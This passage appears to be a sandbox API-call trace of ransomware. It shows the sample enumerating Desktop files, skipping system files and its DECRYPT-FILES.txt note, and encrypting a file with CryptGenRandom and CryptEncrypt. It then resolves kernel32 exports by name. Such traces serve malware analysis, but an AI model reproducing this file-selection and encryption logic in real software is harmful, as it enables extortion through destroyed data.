dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.497] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.497] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.497] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbd8c2f0, ftCreationTime.dwHighDateTime=0x1d4d4f8, ftLastAccessTime.dwLowDateTime=0xe66c7250, ftLastAccessTime.dwHighDateTime=0x1d4d3c2, ftLastWriteTime.dwLowDateTime=0xe66c7250, ftLastWriteTime.dwHighDateTime=0x1d4d3c2, nFileSizeHigh=0x0, nFileSizeLow=0x6e17, dwReserved0=0x0, dwReserved1=0x0, cFileName="pPDIRTkCKpmKuTY.mkv", cAlternateFileName="PPDIRT~1.MKV")) returned 1 [0083.498] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv", lpString2="DECRYPT-FILES.txt") returned 1 [0083.498] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv", lpString2="autorun.inf") returned 1 [0083.498] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv", lpString2="boot.ini") returned 1 [0083.498] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv", lpString2="desktop.ini") returned 1 [0083.498] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv", lpString2="ntuser.dat") returned 1 [0083.498] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv", lpString2="iconcache.db") returned 1 [0083.498] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv", lpString2="bootsect.bak") returned 1 [0083.498] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv", lpString2="ntuser.dat.log") returned 1 [0083.498] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv", lpString2="thumbs.db") returned -1 [0083.498] lstrcmpiW (lpString1="pPDIRTkCKpmKuTY.mkv", lpString2="Bootfont.bin") returned 1 [0083.498] lstrlenW (lpString="pPDIRTkCKpmKuTY.mkv") returned 19 [0083.498] lstrcmpiW (lpString1="mkv", lpString2="lnk") returned 1 [0083.498] lstrcmpiW (lpString1="mkv", lpString2="exe") returned 1 [0083.498] lstrcmpiW (lpString1="mkv", lpString2="sys") returned -1 [0083.498] lstrcmpiW (lpString1="mkv", lpString2="dll") returned 1 [0083.498] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0083.498] lstrlenW (lpString="pPDIRTkCKpmKuTY.mkv") returned 19 [0083.498] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0083.498] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="pPDIRTkCKpmKuTY.mkv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pPDIRTkCKpmKuTY.mkv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pPDIRTkCKpmKuTY.mkv" [0083.498] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.498] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pPDIRTkCKpmKuTY.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ppdirtkckpmkuty.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0083.498] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=28183) returned 1 [0083.498] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0083.499] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.499] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.499] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.499] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.499] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.499] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.500] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.500] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.501] CloseHandle (hObject=0x43c) returned 1 [0083.501] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.501] WriteFile (in: hFile=0x438, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.501] CloseHandle (hObject=0x0) returned 0 [0083.501] CloseHandle (hObject=0x438) returned 1 [0083.502] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.502] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.502] GetTickCount () returned 0x114d578 [0083.502] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.502] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.502] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.503] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.503] lstrlenA (lpString="kernel32.dll") returned 12 [0083.503] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.503] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.503] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.510] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.510] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.510] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.510] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.510] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.510] lstrlenA (lpString="ADDATOMA") returned 8 [0083.510] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.510] lstrlenA (lpString="ADDATOMW") returned 8 [0083.510] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.510] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.510] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.510] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.510] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.511] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.511] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.511] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.511] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.511] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.511] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.511] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.511] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.511] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.511] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.511] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.511] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.511] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.511] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.511] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.511] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.511] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.511] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.511] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.511] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.512] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.512] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.512] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.512] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.512] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.512] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.512] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.512] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.512] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.512] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.512] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.512] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.512] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.512] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.512] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.512] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.512] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.512] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.512] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.513] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.513] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.513] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.513] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.513] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.513] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.513] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.513] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.513] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.513] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.513] lstrlenA (lpString="BEEP") returned 4 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.513] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.513] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.513] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.513] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.513] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.513] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.513] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.513] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.514] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.514] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.514] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.514] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.514] lstrlenA (lpString="CANCELIO") returned 8 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.514] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.514] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.514] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.514] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.514] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.514] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.514] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.514] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.514] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.514] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.514] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.514] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.514] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.514] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.515] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.515] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.515] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.515] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.515] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.515] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.515] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.515] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.515] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.515] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.515] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.515] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.515] lstrlenA (lpString="CMDBATNOTIFICATION") 